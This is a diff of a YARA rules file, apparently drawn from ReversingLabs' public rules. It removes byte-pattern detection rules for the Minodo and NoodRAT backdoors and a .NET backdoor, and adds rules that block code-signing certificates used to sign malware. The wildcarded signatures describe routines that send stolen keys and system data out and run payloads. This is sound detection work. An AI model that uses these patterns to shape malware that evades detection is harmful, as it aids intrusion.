-            7B ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 72 ?? ?? ?? ?? A2 11 ?? 17 02 7C ??
-            ?? ?? ?? 7B ?? ?? ?? ?? 07 6F ?? ?? ?? ?? A2 11 ?? 18 72 ?? ?? ?? ?? A2 11 ?? ?? 06
-            A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7C ?? ?? ?? ??
-            7B ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 07
-            14 6F ?? ?? ?? ?? 07 17 58 0B 07 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 3F
-            ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 73 ??
-            ?? ?? ?? 7D ?? ?? ?? ?? DE 23 0D 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09
-            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 2A
-        }
-		$perform_request = {
-            05 6F ?? ?? ?? ?? 0A 06 04 3D ?? ?? ?? ?? 06 04 19 5B 18 5A 3F ?? ?? ?? ?? 05 16 06
-            19 5B 6F ?? ?? ?? ?? 0B 05 06 19 5B 06 19 5B 6F ?? ?? ?? ?? 0C 05 06 19 5B 18 5A 6F
-            ?? ?? ?? ?? 0D 02 07 28 ?? ?? ?? ?? 0B 02 08 28 ?? ?? ?? ?? 0C 02 09 28 ?? ?? ?? ??
-            0D 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 A2 11 ?? 17 72 ?? ?? ?? ?? A2 11 ?? 18 07
-            A2 11 ?? 19 72 ?? ?? ?? ?? A2 11 ?? 1A 08 A2 11 ?? 1B 72 ?? ?? ?? ?? A2 11 ?? 1C 09
-            A2 11 ?? 1D 72 ?? ?? ?? ?? A2 11 ?? 1E 02 28 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ??
-            ?? A2 11 ?? 1F ?? 02 7B ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 10 ?? 38 ?? ?? ?? ?? 06
-            04 19 5B 18 5A 3D ?? ?? ?? ?? 06 04 19 5B 3F ?? ?? ?? ?? 05 16 06 18 5B 6F ?? ?? ??
-            ?? 13 ?? 05 06 18 5B 6F ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 13 ?? 02 11 ?? 28
-            ?? ?? ?? ?? 13 ?? 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 A2 11 ?? 17 72 ?? ?? ?? ??
-            A2 11 ?? 18 11 ?? A2 11 ?? 19 72 ?? ?? ?? ?? A2 11 ?? 1A 11 ?? A2 11 ?? 1B 72 ?? ??
-            ?? ?? A2 11 ?? 1C 02 28 ?? ?? ?? ?? A2 11 ?? 1D 72 ?? ?? ?? ?? A2 11 ?? 1E 02 7B ??
-            ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 10 ?? 2B ?? 02 05 28 ?? ?? ?? ?? 13 ?? 1D 8D ?? ??
-            ?? ?? 13 ?? 11 ?? 16 03 A2 11 ?? 17 72 ?? ?? ?? ?? A2 11 ?? 18 11 ?? A2 11 ?? 19 72
-            ?? ?? ?? ?? A2 11 ?? 1A 02 28 ?? ?? ?? ?? A2 11 ?? 1B 72 ?? ?? ?? ?? A2 11 ?? 1C 02
-            7B ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 10 ?? 05 2A
-        }
-		$get_txt_record = {
-            14 0A 03 73 ?? ?? ?? ?? 0B 07 6F ?? ?? ?? ?? 0C 7E ?? ?? ?? ?? 1F ?? 73 ?? ?? ?? ??
-            0D 09 08 08 8E 69 6F ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            09 12 ?? 6F ?? ?? ?? ?? 13 ?? 09 6F ?? ?? ?? ?? 07 11 ?? 6F ?? ?? ?? ?? 07 6F ?? ??
-            ?? ?? 13 ?? 28 ?? ?? ?? ?? 12 ?? 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? DE ?? 26 72 ??
-            ?? ?? ?? 13 ?? DE ?? 11 ?? 2A
-        }
-		$main_loop = {
-            73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ??
-            ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 18 16 16 6F ?? ?? ?? ?? 0A 06 28
-            ?? ?? ?? ?? 2D ?? 2A 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 2A 7E ?? ??
-            ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 07 6F ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 12 ?? 7B ?? ?? ?? ?? 0D 12 ?? 7B
-            ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 7E ?? ?? ?? ?? 19 11 ?? 11 ??
-            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2D ?? 14 80 ?? ?? ?? ?? 2A 11 ?? 7E ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 11 ?? 17 58 13 ?? 11 ?? 09 32 ?? 7E ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0B 73 ??
-            ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 07
-            17 6F ?? ?? ?? ?? 13 ?? 11 ?? 7E ?? ?? ?? ?? 1A 16 16 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
-            11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DD ?? ?? ?? ?? 26 DE ?? 2A
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORWARD MUSIC AGENCY SRL" and pe.signatures [ i ] . serial == "12:df:5f:f3:46:09:79:ce:c1:28:8d:87:4a:9f:bf:83" and 1599091200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_Df2547B2Cab5689A81D61De80Eaaa3A2 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "1e76a088-b0f2-54d6-b730-77552c74d7bd"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10824-L10842"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cde89ae5b77ff6833fe642bdd74e81763ef068e31c07e7881906e4e4a5939942"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $unpack_response_p* ) ) and ( $upload ) and ( $perform_request ) and ( $get_txt_record ) and ( $main_loop )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORWARD MUSIC AGENCY SRL" and ( pe.signatures [ i ] . serial == "00:df:25:47:b2:ca:b5:68:9a:81:d6:1d:e8:0e:aa:a3:a2" or pe.signatures [ i ] . serial == "df:25:47:b2:ca:b5:68:9a:81:d6:1d:e8:0e:aa:a3:a2" ) and 1657756800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Backdoor_Minodo : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_28B691272719B1Ee : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Minodo backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0eeff863-1a46-5b25-8780-5cd887e3b1e2"
-		date = "2023-06-07"
-		modified = "2023-06-07"
+		id = "8f1d125a-de0f-525b-8dac-702bc123cc53"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/Win64.Backdoor.Minodo.yara#L1-L110"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "807408699fe00c8d1170598050e533dd0d79bb170f2538b6b6227cda7410060b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10844-L10860"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0bd973f415b7cfa0858c705c4486da9f181c7259af01d1cff486fb6b8e8e775b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "Minodo"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$generate_system_id = {
-            40 55 53 56 57 41 56 48 8D 6C 24 ?? 48 81 EC ?? ?? ?? ?? 4C 8B F1 48 8D 55 ?? 48 8D
-            4D ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 DB 85 C0 75 ?? 66 C7 45 ?? ?? ?? 4C
-            8D 45 ?? 48 8D 55 ?? B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75
-            ?? 66 C7 45 ?? ?? ?? 48 83 4D ?? ?? 4C 8D 4D ?? 4C 8D 45 ?? 8B CB 48 8B D3 BE ?? ??
-            ?? ?? 48 85 D2 7E ?? 44 8A 54 15 ?? EB ?? 44 8A 95 ?? ?? ?? ?? 41 8A 01 49 FF C1 48
-            FF C2 32 44 15 ?? 41 32 C2 41 32 00 49 FF C0 88 44 15 ?? 41 38 19 75 ?? 83 C9 ?? 4C
-            8D 4D ?? 41 38 18 75 ?? 83 C9 ?? 4C 8D 45 ?? 48 3B D6 75 ?? 83 C9 ?? 48 8B D3 83 F9
-            ?? 75 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? FF 15 ?? ?? ?? ?? 48 8D 5D ?? 49 8B FE 44
-            0F B6 03 48 8D 55 ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 83 C7 ?? 48 FF C3 48 FF CE 75 ??
-            FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? 8B D8 FF 15 ?? ?? ?? ?? 48 8D 55
-            ?? 44 8B CB 4D 8B C6 49 8B CE FF 15 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5E 5F 5E 5B
-            5D C3
-        }
-		$generate_encrypt_and_send_key = {
-            48 8B C4 48 89 58 ?? 48 89 68 ?? 48 89 70 ?? 48 89 78 ?? 41 56 48 81 EC ?? ?? ?? ??
-            8B F2 E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 40 ?? 48 8B 08 8B 09
-            E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 45 33 C0 45 8D 70 ?? 41 8D 50 ?? 41 8B CE E8
-            ?? ?? ?? ?? 48 8B D8 83 F8 ?? 74 ?? 41 8D 6E ?? 48 8D 44 24 ?? 8B CD C6 00 ?? 48 FF
-            C0 48 FF C9 75 ?? 0F B7 CE 66 44 89 74 24 ?? E8 ?? ?? ?? ?? 48 8B CF 66 89 44 24 ??
-            E8 ?? ?? ?? ?? 48 63 FB 48 8D 54 24 ?? 48 8B CF 44 8B C5 89 44 24 ?? E8 ?? ?? ?? ??
-            85 C0 74 ?? 48 8B CF E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 2D ?? ?? ?? ?? BE ?? ?? ??
-            ?? 48 8B CD 8B D6 E8 ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? 33 C9 8A 44 29 ?? 48 FF C9 88
-            44 0C ?? 48 FF CE 75 ?? 8D 56 ?? 44 8D 46 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B CF
-            8B F0 85 C0 74 ?? 48 8D 54 24 ?? 45 33 C9 44 8B C0 E8 ?? ?? ?? ?? 3B C6 74 ?? 48 8B
-            CF E8 ?? ?? ?? ?? 33 DB 8B C3 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 6B ?? 49 8B
-            73 ?? 49 8B 7B ?? 49 8B E3 41 5E C3
-        }
-		$get_encrypt_and_send_system_info = {
-            48 89 5C 24 ?? 48 89 74 24 ?? 48 89 7C 24 ?? 55 48 8D 6C 24 ?? 48 81 EC ?? ?? ?? ??
-            8B F1 48 8B CA 48 8B DA FF 15 ?? ?? ?? ?? C6 44 24 ?? ?? 48 63 F8 40 88 7C 24 ?? 4C
-            8B C7 85 C0 74 ?? 48 8D 44 24 ?? 48 2B D8 48 8D 4C 24 ?? 49 FF C8 4A 8D 0C 01 8A 04
-            0B 88 01 75 ?? 83 C7 ?? 48 63 DF E8 ?? ?? ?? ?? BA ?? ?? ?? ?? F6 D8 48 8D 45 ?? 1A
-            C9 80 E1 ?? 80 C9 ?? FF C7 88 4C 1C ?? 8B CA C6 00 ?? 48 FF C0 48 FF C9 75 ?? 48 8D
-            4D ?? 89 55 ?? FF 15 ?? ?? ?? ?? 8A 45 ?? 48 63 CF 88 44 0C ?? 8A 45 ?? FF C7 48 63
-            CF FF C7 BB ?? ?? ?? ?? 88 44 0C ?? 8A 45 ?? 48 63 CF 88 44 0C ?? 8A 45 ?? FF C7 48
-            63 CF FF C7 4C 8D 85 ?? ?? ?? ?? 88 44 0C ?? 8A 45 ?? 48 63 D7 88 44 14 ?? 8B 45 ??
-            FF C7 48 63 D7 8D 4B ?? C6 44 24 ?? ?? 89 44 14 ?? 48 8D 54 24 ?? 83 C7 ?? 89 9D ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 44 8B C0 8D 48 ?? 03 CF
-            48 63 D1 48 83 FA ?? 76 ?? 44 8D 43 ?? 44 2B C7 48 63 C7 FF C7 4C 8D 54 24 ?? 44 88
-            44 04 ?? 48 63 C7 49 63 D0 4C 03 D0 45 85 C0 74 ?? 4C 8D 4C 24 ?? 4A 8D 0C 12 4D 2B
-            CA 48 FF C9 41 8A 04 09 88 01 48 FF CA 75 ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? 41
-            03 F8 C6 44 24 ?? ?? 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ??
-            ?? ?? 44 8B C0 8D 48 ?? 03 CF 48 63 D1 48 83 FA ?? 76 ?? 41 B8 ?? ?? ?? ?? 44 2B C7
-            48 63 C7 FF C7 4C 8D 54 24 ?? 44 88 44 04 ?? 48 63 C7 49 63 D0 4C 03 D0 45 85 C0 74
-            ?? 4C 8D 4C 24 ?? 4A 8D 0C 12 4D 2B CA 48 FF C9 42 8A 04 09 88 01 48 FF CA 75 ?? 4C
-            8D 4C 24 ?? 48 8D 54 24 ?? 44 03 C7 8B CE E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49
-            8B 5B ?? 49 8B 73 ?? 49 8B 7B ?? 49 8B E3 5D C3
-        }
-		$copy_payload_into_allocated_memory = {
-            48 89 5C 24 ?? 48 89 6C 24 ?? 56 57 41 56 48 83 EC ?? 49 8B D8 48 63 F2 48 8B F9 41
-            C6 00 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 66 C7 03 ?? ?? B8 ?? ??
-            ?? ?? E9 ?? ?? ?? ?? 4C 8D 4C 24 ?? 4C 8D 44 24 ?? 48 8B D3 48 8B CF E8 ?? ?? ?? ??
-            8B E8 85 C0 74 ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D6 33 C9 4C 8B F6 FF 15
-            ?? ?? ?? ?? 48 8B F0 48 85 C0 75 ?? 66 C7 03 ?? ?? FF 15 ?? ?? ?? ?? 89 43 ?? 8D 46
-            ?? EB ?? 4D 8B C6 48 8B D7 48 8B C8 E8 ?? ?? ?? ?? 48 83 64 24 ?? ?? 83 64 24 ?? ??
-            4C 8D 04 2E 45 33 C9 33 D2 33 C9 FF 15 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 8B 44
-            24 ?? 48 8B 5C 24 ?? 48 8B 6C 24 ?? 48 83 C4 ?? 41 5E 5F 5E C3
-        }
-		$execute_payload_from_temp = {
-            40 53 48 81 EC ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 4C 8B D1 48 8D 44 24 ?? 41 8B D0 33 DB
-            88 18 48 FF C0 48 FF CA 75 ?? 48 8D 44 24 ?? 8D 4A ?? 88 18 48 FF C0 48 FF C9 75 ??
-            48 8D 44 24 ?? 44 89 44 24 ?? 45 33 C9 48 89 44 24 ?? 48 8D 44 24 ?? 45 33 C0 48 89
-            44 24 ?? 48 89 5C 24 ?? 48 89 5C 24 ?? 49 8B D2 89 5C 24 ?? C7 84 24 ?? ?? ?? ?? ??
-            ?? ?? ?? 89 5C 24 ?? 66 89 9C 24 ?? ?? 00 00 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C
-            24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? B0 ?? EB ?? 32 C0 48 81 C4
-            ?? ?? ?? ?? 5B C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $generate_system_id ) and ( $generate_encrypt_and_send_key ) and ( $get_encrypt_and_send_system_info ) and ( $copy_payload_into_allocated_memory ) and ( $execute_payload_from_temp )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2021945 Ontario Inc." and pe.signatures [ i ] . serial == "28:b6:91:27:27:19:b1:ee" and 1616410532 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Backdoor_Noodrat : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1C897216E58E83Cbe74Ad03284E1Fb82 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects NoodRAT backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ac5eae27-dc42-5060-b639-c23c0bbabb50"
-		date = "2024-08-26"
-		modified = "2024-08-26"
+		id = "8805805d-312d-5bd4-94da-c18270ac26bf"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/Linux.Backdoor.NoodRAT.yara#L1-L162"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2ec4a8ba7428054edb4dcdb6a00015b9758badf515f2c210bb946ba5402674d2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10862-L10878"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6b3b2708d3a442fa6425e60ae900c94fc22fbfdb47f290ff56e9d349d99fd85f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "NoodRAT"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$change_name_on_system_p1 = {
-            41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 89 FB 48 8D BC 24 ?? ?? ?? ?? B8 ??
-            ?? ?? ?? B9 ?? ?? ?? ?? F3 48 AB 48 8D BC 24 ?? ?? ?? ?? B1 ?? F3 48 AB C6 84 24 ??
-            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ??
-            C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ??
-            ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 0F B7 15
-            ?? ?? ?? ?? 66 89 55 ?? 4C 8D 65 ?? 0F B7 D2 BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ??
-            48 8D 94 24 ?? ?? ?? ?? 0F B7 75 ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ??
-            4C 89 E6 48 89 EF E8 ?? ?? ?? ?? 4C 8B 03 48 C7 C6 ?? ?? ?? ?? 4C 89 C7 B8 ?? ?? ??
-            ?? 48 89 F1 F2 AE 48 F7 D1 48 8D 14 31 48 89 EF 48 89 F1 F2 AE 48 89 CE 48 F7 D6 48
-            83 EE ?? 48 39 F2 72 ?? BE ?? ?? ?? ?? 4C 89 C7 E8 ?? ?? ?? ?? 48 89 EE 48 8B 3B E8
-            ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? B9
-            ?? ?? ?? ?? F3 48 AB 48 8D BC 24 ?? ?? ?? ?? B1 ?? F3 48 AB C6 84 24 ?? ?? ?? ?? ??
-            C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ??
-            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ??
-            C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ??
-            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ??
-            C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ??
-            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ??
-            48 8D BC 24 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C2 B8 ?? ?? ?? ?? 48 85
-            D2 0F 8E ?? ?? ?? ?? 48 C7 C2 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 D1 F2 AE 48
-        }
-		$change_name_on_system_p2 = {
-            89 CB 48 8D BC 24 ?? ?? ?? ?? 48 89 D1 F2 AE F7 D3 8D 5C 0B ?? 85 DB B8 ?? ?? ?? ??
-            0F 4E D8 48 8D B4 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48
-            89 EF B8 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7 D1 48 8D 79 ?? 48 63 D3 48 63
-            FF 48 8D 7C 3D ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ??
-            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ??
-            C6 84 24 ?? ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 49 89 C6 48
-            8D B4 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C3 48 89 E7 B9 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? F3 48 AB C6 07 ?? 48 89 E5 41 BC ?? ?? ?? ?? 41 BD ?? ?? ??
-            ?? EB ?? 48 89 EF 4C 89 E9 4C 89 E0 F3 48 AB C6 07 ?? 48 89 D9 BA ?? ?? ?? ?? BE ??
-            ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0 7E ?? 48 63 D0 4C 89 F1 BE ?? ?? ?? ?? 48 89
-            E7 E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89
-            F7 E8 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 75 ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ??
-            ?? ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 85 C0 7E
-            ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ??
-            ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E C3
-        }
-		$decrypt_configuration_p1 = {
-            41 57 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 89 7C 24 ?? 48 8D 9C 24 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 DF F3 48 AB C6 07 ?? 48 8D 54 24 ?? B1 ??
-            48 89 D7 F3 48 AB C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44
-            24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? 48 8D 54 24 ?? 0F B7 35 ?? ??
-            ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 C7 C1 ?? ?? ??
-            ?? F2 AE 48 F7 D1 48 83 E9 ?? 48 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 0F 46 D1 BE ??
-            ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? 48 8D 74 24 ?? 48 89
-            DF E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 50 ?? 48 89 54 24 ?? C6 00 ?? 48
-            8D 74 24 ?? 48 89 D7 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 48 ?? 48 89 4C
-            24 ?? C6 00 ?? 48 8D 74 24 ?? 48 89 CF E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 85 C0 0F 84
-            ?? ?? ?? ?? C6 00 ?? 48 8D B4 24 ?? ?? ?? ?? 48 C7 C5 ?? ?? ?? ?? 48 89 F7 41 BC ??
-            ?? ?? ?? 48 89 E9 44 89 E0 F2 AE 48 F7 D1 48 01 E9 48 8D 5C 24 ?? 48 81 F9 ?? ?? ??
-            ?? BA ?? ?? ?? ?? 48 0F 46 D1 48 89 DF E8 ?? ?? ?? ?? 48 89 DF 48 89 E9 44 89 E0 F2
-            AE 48 89 CD 48 F7 D5 83 ED ?? 8D 45 ?? 48 98 80 7C 04 ?? ?? 74 ?? 48 63 C5 C6 44 04
-            ?? ?? 83 C5 ?? 48 63 ED C6 44 2C ?? ?? 4C 8D 6C 24 ?? 4C 89 EB BD ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? 41 BC ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 49 C7 C6 ?? ?? ?? ?? 4D 89 EF E9 ?? ?? ?? ?? 0F B6 03 3C ?? 75
